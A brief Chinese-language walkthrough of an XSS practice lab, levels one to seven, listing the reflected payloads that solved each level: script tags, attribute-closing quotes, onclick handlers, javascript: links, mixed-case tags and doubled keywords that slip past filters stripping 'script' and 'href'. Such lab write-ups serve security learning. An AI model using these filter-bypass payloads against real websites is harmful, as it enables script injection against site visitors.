第一关
首先进入页面咱们直接来试试反射型 <script>alert(1)</script>直接就成功了然后开启第二关
第二关
进来后看见搜索框不知道它的闭合是什么样的咱们直接右击查看页面源代码去看看
输入"><script>alert(1)</script>直接通过
第三关
这里输入语句发现错误来到页面源代码查看发现< >被转义过滤了
这里回去改一下语句' οnclick=alert(1)//
第四关
跟第三关差不多我们看一下页面代码就知晓了" οnclick=alert(1)//是双引号闭合
第五关
这里还是去看页面源代码分析 进行尝试"><script>alert(1)</script>
发现不对然后换<a>成功
"><a href=javascript:alert(1)>11</a>//
第六关
这里还是进行尝试看页面源代码
然后判断它的输出方式
"><scriPt>alert(1)</script>
第七关
这里也是用<a>标签尝试"><a hrhrefef=javascrscriptipt:alert(1)>sxy</a>//成功
